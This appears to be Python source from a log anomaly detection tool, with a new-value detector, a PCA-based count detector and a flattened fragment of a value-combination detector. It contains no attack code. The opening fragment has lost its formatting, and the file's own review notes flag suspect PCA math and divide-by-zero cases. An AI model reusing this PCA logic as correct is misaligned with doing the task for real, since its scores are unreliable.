allow hash operation needed by set. self.known_values_set = {tuple(record) for record in persistence_data} logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. 
@return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() match_value_list = [] for target_path in self.target_path_list: match_element = match_dict.get(target_path) if match_element is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match_element, list): matches = match_element else: matches.append(match_element) for match_element in matches: match_value_list.append(match_element.match_object) match_value_tuple = tuple(match_value_list) affected_log_atom_values = [] for match_value in match_value_list: if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) if match_value_tuple not in self.known_values_set: if self.learn_mode: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max( self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) 
analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_log_atom_values} event_data = {"AnalysisComponent": analysis_component} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(match_value_tuple) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(match_value_tuple)] for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" try: # Sort the known_values_set before storing as json. This improves the deterministic behavior / reproducible results. # The Lambda function is only used to allow sorting of tuple values which contain None. 
PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.known_values_set), key=lambda L: tuple(el if el is not None else b'-' for el in L))) except TypeError: PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, tuple) or len(event_data) != len(self.target_path_list): msg = "event_data has to be of type tuple." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not self.allow_missing_values_flag and None in event_data: msg = "event_data must not have None values if allow_missing_values_flag is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.known_values_set.add(event_data) return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}." def add_to_persistency_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. 
""" if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != len(self.target_path_list): msg = "Event_data has the wrong format." \ "The supported format is [value_1, value_2, ..., value_n] where n is the number of analyzed paths." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list = [] for match_element in event_data: if match_element is None: if not self.allow_missing_values_flag: msg = "Empty entry detected in event_data." \ "Please fill entry or set parameter allow_missing_values_flag to true." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list.append(None) else: match_value_list.append(bytes(match_element, "utf-8")) match_value_tuple = tuple(match_value_list) if match_value_tuple not in self.known_values_set: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) return f"Added values [{', '.join(event_data)}] of paths [{', '.join(self.target_path_list)}] to the persistence." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes." 
" Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathValueDetector.py000066400000000000000000000262601500476301700363410ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for new values in a data path. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
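"""
import os
import logging
from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class NewMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """This class creates events when new values for a given data path were found."""

    time_trigger_class = AnalysisContext.TIME_TRIGger_CLASS_REALTIME if False else AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", learn_mode=False,
                 output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param learn_mode when set to True, this detector will report a new value only the first time before including it in the
               known values set automatically.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose atoms are skipped without being analyzed.
        @raises ValueError when target_path_list is None or empty.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list,
            mutable_default_args=["log_resource_ignore_list"]
        )
        if not self.target_path_list:
            msg = "target_path_list must not be None or empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.log_learned_path_values = 0
        self.log_new_learned_values = []
        self.known_values_set = set()
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        self.load_persistence_data()

    def _is_ignored_resource(self, log_atom):
        """Return True when the atom's resource name is on the configured ignore list."""
        if not self.log_resource_ignore_list:
            return False
        return log_atom.source.resource_name.decode() in self.log_resource_ignore_list

    def _initialize_stop_learning_time(self, log_atom):
        """Turn the relative stop_learning_* offsets into an absolute deadline the first time an atom is seen."""
        if self.stop_learning_time_initialized:
            return
        self.stop_learning_time_initialized = True
        if self.stop_learning_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
        elif self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time

    @staticmethod
    def _value_to_str(value):
        """Render a match object for output: bytes are decoded with the configured encoding, everything else via str()."""
        if isinstance(value, bytes):
            return value.decode(AminerConfig.ENCODING)
        return str(value)

    @staticmethod
    def _decode_raw_data(log_atom):
        """Decode the raw log line for output, falling back to repr() when it is not valid in the configured encoding."""
        try:
            return log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            return repr(log_atom.raw_data)

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        Every value found below one of the target paths is compared with the set of known values. Unknown values are reported to
        the anomaly event handlers; in learn mode they are added to the known set as well.
        @param log_atom the parsed log atom to inspect.
        @return False when the atom's resource is ignored, True otherwise.
        """
        if self._is_ignored_resource(log_atom):
            return False
        self.log_total += 1
        self._initialize_stop_learning_time(log_atom)
        match_dict = log_atom.parser_match.get_match_dictionary()
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        for target_path in self.target_path_list:
            match = match_dict.get(target_path)
            if match is None:
                continue
            matches = match if isinstance(match, list) else [match]
            affected_log_atom_values = []
            for match_element in matches:
                value = match_element.match_object
                if value in self.known_values_set:
                    continue
                if self.learn_mode:
                    self.known_values_set.add(value)
                    self.log_learned_path_values += 1
                    self.log_new_learned_values.append(value)
                    # A newly learned value counts as activity and pushes the no-anomaly learning deadline forward.
                    if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                        self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
                affected_log_atom_values.append(self._value_to_str(value))
            if not affected_log_atom_values:
                continue
            analysis_component = {"AffectedLogAtomPaths": [target_path], "AffectedLogAtomValues": affected_log_atom_values}
            if isinstance(match, list):
                res = {target_path: affected_log_atom_values}
            else:
                # Only bytes are decoded here; other match objects are kept as-is so str(res) shows their native form.
                res_value = match.match_object
                if isinstance(res_value, bytes):
                    res_value = res_value.decode(AminerConfig.ENCODING)
                res = {target_path: res_value}
            data = self._decode_raw_data(log_atom)
            if self.output_logline:
                original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                sorted_log_lines = [str(res) + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [str(res)]
            event_data = {"AnalysisComponent": analysis_component}
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value(s) detected", sorted_log_lines, event_data,
                                       log_atom, self)
        self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the time the timer fired.
        @return the number of seconds until the next persistence check.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage.

        bytes and non-bytes values are sorted separately because Python cannot order a mixed list of them.
        """
        data = list(self.known_values_set)
        bts = [x for x in data if isinstance(x, bytes)]
        other = [x for x in data if not isinstance(x, bytes)]
        PersistenceUtil.store_json(self.persistence_file_name, sorted(other) + sorted(bts))
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage and register this component for periodic persistence."""
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            self.known_values_set = set(persistence_data)
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be the event type emitted by this detector.
        @param event_data the raw value (bytes) to add to the known values.
        @param allowlisting_data not supported by this detector; must be None.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        @throws TypeError when event_data is not of type bytes.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(event_data, bytes):
            msg = "event_data has to be of type bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Render the value before mutating the known set: a value that is not valid UTF-8 must not leave the detector in an
        # allowlisted-but-reported-as-failed state. Same fallback as used for raw log data in receive_atom.
        try:
            value_str = event_data.decode()
        except UnicodeError:
            value_str = repr(event_data)
        self.known_values_set.add(event_data)
        return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {value_str}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_values)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes."
                " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total,
                self.log_learned_path_values, self.log_new_learned_values)
        # Counters are per reporting period and start over after each report.
        self.log_success = 0
        self.log_total = 0
        self.log_learned_path_values = 0
        self.log_new_learned_values = []


"""This module defines a PCA-detector for event and value counts.

The component detects anomalies by creating an Event-Count-Matrix for given time-windows to calculate an anomaly score for new time
windows afterwards by using the reconstruction error from the inverse-transformation with restricted components of the
Principal-Component-Analysis (PCA).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.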
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import copy
import numpy as np
import logging
import os
from aminer import AminerConfig
from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LEVEL, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \
    KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer.AnalysisChild import AnalysisContext
from aminer.util import PersistenceUtil
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class PCADetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface):
    """This class creates events if event or value occurrence counts are outliers in PCA space."""

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, window_size, min_anomaly_score, min_variance, num_windows,
                 persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate
               dimensions. NOTE(review): the docstring of the original component also describes an "events given by the full path
               list" mode for an empty list, but the constructor below rejects an empty list, so that mode is unreachable here.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param window_size the length of the time window for counting in seconds.
        @param min_anomaly_score the minimum computed outlier score for reporting anomalies. Scores are scaled by training data,
               i.e., reasonable minimum scores are >1 to detect outliers with respect to currently trained PCA matrix.
        @param min_variance the minimum variance covered by the principal components in range [0, 1].
        @param num_windows the number of time windows in the sliding window approach. Total covered time span = window_size *
               num_windows.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether new count measurements are added to the PCA count matrix.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose atoms are skipped without being analyzed.
        @raises ValueError when target_path_list is empty or num_windows is below 3.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config,
            target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, window_size=window_size,
            min_anomaly_score=min_anomaly_score, min_variance=min_variance, num_windows=num_windows, persistence_id=persistence_id,
            learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list,
            stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time,
            log_resource_ignore_list=log_resource_ignore_list
        )
        if not self.target_path_list:
            msg = "target_path_list must not be empty or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if num_windows < 3:
            msg = "num_windows must be greater than 2."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # Window bookkeeping: start_time is taken from the first atom, then advanced by window_size per closed window.
        self.first_log = True
        self.start_time = 0
        self.log_windows = 0
        # One count dictionary per closed window (the training data) and the counts of the window currently open.
        self.event_count_matrix = []
        self.event_count_vector = {}
        self.feature_list = []
        # Trained PCA state, filled by compute_pca(): raw count matrix, projected matrix, eigenvectors, number of components
        # used for reconstruction and the per-row reconstruction error of the training data.
        self.ecm = None
        self.pca_ecm = None
        self.eigen_vectors = None
        self.n_comp = None
        self.loss = None
        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def _is_ignored_resource(self, log_atom):
        """Return True when the atom's resource name is on the configured ignore list."""
        if not self.log_resource_ignore_list:
            return False
        return log_atom.source.resource_name.decode() in self.log_resource_ignore_list

    def _initialize_stop_learning_time(self, log_atom):
        """Turn the relative stop_learning_* offsets into an absolute deadline the first time an atom is seen."""
        if self.stop_learning_time_initialized:
            return
        self.stop_learning_time_initialized = True
        if self.stop_learning_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
        elif self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time

    def _matrix_is_ready(self):
        """PCA computation is only possible with at least 3 window vectors, each holding at least 2 counts per path."""
        if len(self.event_count_matrix) < 3:
            return False
        return all(all(len(counts) >= 2 for counts in window.values()) for window in self.event_count_matrix)

    @staticmethod
    def _decode_raw_data(log_atom):
        """Decode the raw log line for output, falling back to repr() when it is not valid in the configured encoding."""
        try:
            return log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            return repr(log_atom.raw_data)

    def _report_anomaly(self, log_atom, anomaly_score):
        """Send a "PCA anomaly detected" event describing the counts of the window that just closed."""
        data = self._decode_raw_data(log_atom)
        if self.output_logline:
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data]
        else:
            sorted_log_lines = [data]
        affected_paths = list(self.event_count_vector.keys())
        affected_values = [list(count_dict.keys()) for count_dict in self.event_count_vector.values()]
        affected_counts = [list(count_dict.values()) for count_dict in self.event_count_vector.values()]
        analysis_component = {"AffectedLogAtomPaths": affected_paths, "AffectedLogAtomValues": affected_values,
                              "AffectedValueCounts": affected_counts, "AnomalyScore": anomaly_score[0]}
        event_data = {"AnalysisComponent": analysis_component}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", "PCA anomaly detected", sorted_log_lines, event_data,
                                   log_atom, self)

    def _close_window(self, log_atom):
        """Score the window that just ended, add it to the training matrix in learn mode and open the next window."""
        if self._matrix_is_ready():
            anomaly_score = self.anomaly_score()
            if anomaly_score > self.min_anomaly_score:
                self._report_anomaly(log_atom, anomaly_score)
        self.log_windows += 1
        if self.learn_mode is True:
            # Sliding window over the last num_windows count vectors.
            if len(self.event_count_matrix) >= self.num_windows:
                del self.event_count_matrix[0]
            self.event_count_matrix.append(copy.deepcopy(self.event_count_vector))
            if self._matrix_is_ready():
                self.repair_dict()
                self.compute_pca()
            if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
        # Set window end time for next iteration and reset the count vector for the next time window.
        self.start_time += self.window_size
        self.reset_event_count_vector()

    @staticmethod
    def _value_to_str(value):
        """Render a match object as a count key: bytes are decoded with the configured encoding, everything else via str()."""
        if isinstance(value, bytes):
            return value.decode(AminerConfig.ENCODING)
        return str(value)

    def _count_atom(self, parser_match):
        """Add the atom to the counts of the open window; return False when nothing was counted."""
        match_dict = parser_match.get_match_dictionary()
        if not self.target_path_list:
            # Event is defined by the full path of log atom. NOTE(review): unreachable with the constructor check on
            # target_path_list above; kept as in the original implementation.
            if self.constraint_list != [] and not any(match_dict.get(path) is not None for path in self.constraint_list):
                return False
            log_event = tuple(match_dict.keys())
            event_counts = self.event_count_vector[""]
            event_counts[log_event] = event_counts.get(log_event, 0) + 1
            return True
        # Event is defined by values in target_path_list.
        counted = False
        for path in self.target_path_list:
            match = match_dict.get(path)
            if match is None:
                continue
            for match_element in (match if isinstance(match, list) else [match]):
                value = self._value_to_str(match_element.match_object)
                counted = True
                path_counts = self.event_count_vector.setdefault(path, {})
                path_counts[value] = path_counts.get(value, 0) + 1
        return counted

    def receive_atom(self, log_atom):
        """Receive parsed atom and the information about the parser match.

        Atoms are counted per time window; whenever the atom's timestamp lies beyond the open window, that window is closed and
        scored against the PCA model trained on the previous windows.
        @param log_atom the parsed log atom to inspect.
        @return False when the atom was ignored or contributed no counts, True otherwise.
        """
        if self._is_ignored_resource(log_atom):
            return False
        self._initialize_stop_learning_time(log_atom)
        parser_match = log_atom.parser_match
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        # Skip paths from ignore list.
        if any(ignore_path in parser_match.get_match_dictionary() for ignore_path in self.ignore_list):
            return False
        # get the timestamp of the first log to start the time-window-process (flag)
        if self.first_log:
            self.start_time = log_atom.get_timestamp()
            self.first_log = False
        current_time = log_atom.get_timestamp()
        # Empty windows between the last counted atom and this one are closed (and scored) one by one.
        while current_time >= (self.start_time + self.window_size):
            self._close_window(log_atom)
        if not self._count_atom(parser_match):
            return False
        self.log_success += 1
        return True

    def compute_pca(self):
        """Carry out PCA on current event count matrix.

        The feature order is taken from the first window of the matrix; all windows are expected to carry the same keys (see
        repair_dict). NOTE(review): np.linalg.eigh returns eigenvalues in ascending order while get_n_comp counts the reversed
        eigenvalues, and the reconstruction below slices eigenvector rows, not columns — confirm this is the intended projection.
        NOTE(review): a constant matrix (std() == 0) makes the normalization divide by zero.
        """
        # extract the features out of ecm into a list
        self.feature_list = [feature for events in self.event_count_matrix[0].values() for feature in events]
        # extract existing event_counts into array
        matrix = [[count for event in event_count.values() for count in event.values()] for event_count in self.event_count_matrix]
        self.ecm = np.array(matrix)
        # Principal Component Analysis (PCA)
        normalized_ecm = (self.ecm - self.ecm.mean()) / self.ecm.std()
        covariance_matrix = np.cov(normalized_ecm.T)
        eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix)
        self.pca_ecm = normalized_ecm @ eigen_vectors
        self.eigen_vectors = eigen_vectors
        # number of components (n_comp): how many components should be used for reconstruction
        self.n_comp = self.get_n_comp(eigen_values)
        # PCA Inverse with only these components which describes the min_variance
        pca_inverse = self.pca_ecm[:, :self.n_comp] @ eigen_vectors[:self.n_comp, :]
        # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset
        self.loss = np.sum((normalized_ecm - pca_inverse)**2, axis=1)

    def anomaly_score(self):
        """Calculate the anomalyscore for current event_count_vector.

        @return a 1-element array holding the reconstruction error of the current window, min/max scaled by the training loss.
        NOTE(review): when all training losses are equal the scaling divides by zero.
        """
        # convert the event_count_vector into an array and normalize it with the mean and std of learned ecm
        normalized_ecv = (self.vector2array() - self.ecm.mean()) / self.ecm.std()
        # reshape array into a single row
        normalized_ecv = normalized_ecv.reshape(1, -1)
        # project onto the learned eigenvectors and reconstruct with the reduced number of components
        projected = normalized_ecv @ self.eigen_vectors
        reconstructed = projected[:, :self.n_comp] @ self.eigen_vectors[:self.n_comp, :]
        # reconstruction error, scaled with the min and max of the training loss
        reconstruction_error = np.sum((normalized_ecv - reconstructed)**2, axis=1)
        return (reconstruction_error - np.min(self.loss)) / (np.max(self.loss) - np.min(self.loss))

    def vector2array(self):
        """Extract only the values which were learned before from current self.event_count_vector and return an array."""
        values = [event[key] for event in self.event_count_vector.values() for key in self.feature_list if key in event]
        return np.array(values)

    def get_n_comp(self, eigen_values):
        """Return the number of components, which describe the variance threshold.

        @param eigen_values eigenvalues of the covariance matrix as returned by np.linalg.eigh.
        @return the first index at which the cumulative explained variance exceeds min_variance, or None if it never does.
        """
        # Calculate the explained variance on each of components (in percent, largest eigenvalue first)
        total = sum(eigen_values)
        variance_explained = [(value / total) * 100 for value in eigen_values[::-1]]
        # Calculate the cumulative explained variance (np.cumsum)
        cumulative_variance_explained = np.cumsum(variance_explained)
        threshold = self.min_variance * 100
        return next((n for n, cumulative in enumerate(cumulative_variance_explained) if cumulative > threshold), None)

    def repair_dict(self):
        """Check if any new values were added in current event_count_vector and repair self.event_count_matrix when necessary.

        Paths or values first seen in the open window are added to every stored window with a count of 0.
        """
        for window in self.event_count_matrix:
            for path, current_counts in self.event_count_vector.items():
                if path not in window:
                    for value in current_counts:
                        window[path] = {value: 0}
                if window[path].keys() != current_counts.keys():
                    for value in current_counts:
                        if value not in window[path]:
                            window[path][value] = 0

    def reset_event_count_vector(self):
        """Reset event_count_vector by setting all count-values to 0."""
        for counts in self.event_count_vector.values():
            for key in counts:
                counts[key] = 0

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the time the timer fired.
        @return the number of seconds until the next persistence check.
        """
        persistence_period = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        if self.next_persist_time is None:
            return persistence_period
        delta = self.next_persist_time - trigger_time
        if delta > 0:
            return delta
        self.do_persist()
        self.next_persist_time = trigger_time + persistence_period
        return persistence_period

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, list(self.event_count_matrix))

    def load_persistence_data(self):
        """Load the persistence data from storage and rebuild the PCA model from it."""
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is None:
            if not self.target_path_list:
                # Only one dimension when events are used instead of values; use empty string as placeholder
                self.event_count_vector = {"": {}}
            return
        self.event_count_matrix = list(persistence_data)
        self.compute_pca()
        # Copy feature list into event count vector and reset counts of each feature
